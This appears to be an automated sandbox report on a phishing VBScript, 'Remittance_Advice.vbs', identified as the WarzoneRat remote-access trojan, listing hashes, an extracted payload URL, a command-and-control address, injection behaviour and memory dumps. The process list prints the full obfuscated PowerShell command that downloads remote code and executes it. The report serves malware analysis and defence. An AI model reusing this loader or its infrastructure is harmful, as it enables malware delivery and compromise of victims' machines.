Analysis
-
max time kernel
299s -
max time network
283s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-07-2021 17:12
Static task
static1
Behavioral task
behavioral1
Sample
Remittance_Advice.vbs
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Remittance_Advice.vbs
Resource
win10v20210410
General
-
Target
Remittance_Advice.vbs
-
Size
875B
-
MD5
fc4a8faf57b167de212a02466d0f5435
-
SHA1
8b83c8dad3b1168c37729b8c6551e7ac4d0071af
-
SHA256
84199bedc07e09ccb967692a43de715611625dc247ceea48ea2f4a7109bc5287
-
SHA512
855874d54ef794939a9c2da096dda06168f34cdb17500d762a4bbdaeb0e5ad687da86791150b83381e3617ff5ff88fb124c7b2d76c5f120b997d91206b7d18f0
Malware Config
Extracted
https://www.maan2u.com/a/ALL.txt
Extracted
warzonerat
192..3.146.165:3543
Signatures
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
suricata: ET MALWARE PE EXE or DLL Windows file download Text
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 700 powershell.exe 17 700 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 700 set thread context of 2616 700 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 700 powershell.exe 700 powershell.exe 700 powershell.exe 700 powershell.exe 700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 700 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 4048 wrote to memory of 700 4048 WScript.exe powershell.exe PID 4048 wrote to memory of 700 4048 WScript.exe powershell.exe PID 700 wrote to memory of 1560 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 1560 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 1560 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe PID 700 wrote to memory of 2616 700 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://www.maan2u.com/a/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/700-114-0x0000000000000000-mapping.dmp
-
memory/700-119-0x000002172BC10000-0x000002172BC11000-memory.dmpFilesize
4KB
-
memory/700-123-0x00000217443D0000-0x00000217443D1000-memory.dmpFilesize
4KB
-
memory/700-130-0x0000021744113000-0x0000021744115000-memory.dmpFilesize
8KB
-
memory/700-129-0x0000021744110000-0x0000021744112000-memory.dmpFilesize
8KB
-
memory/700-131-0x0000021744116000-0x0000021744118000-memory.dmpFilesize
8KB
-
memory/700-152-0x00000217440E0000-0x00000217440F3000-memory.dmpFilesize
76KB
-
memory/700-153-0x0000021744100000-0x0000021744102000-memory.dmpFilesize
8KB
-
memory/2616-156-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/2616-157-0x0000000000405E28-mapping.dmp
-
memory/2616-173-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB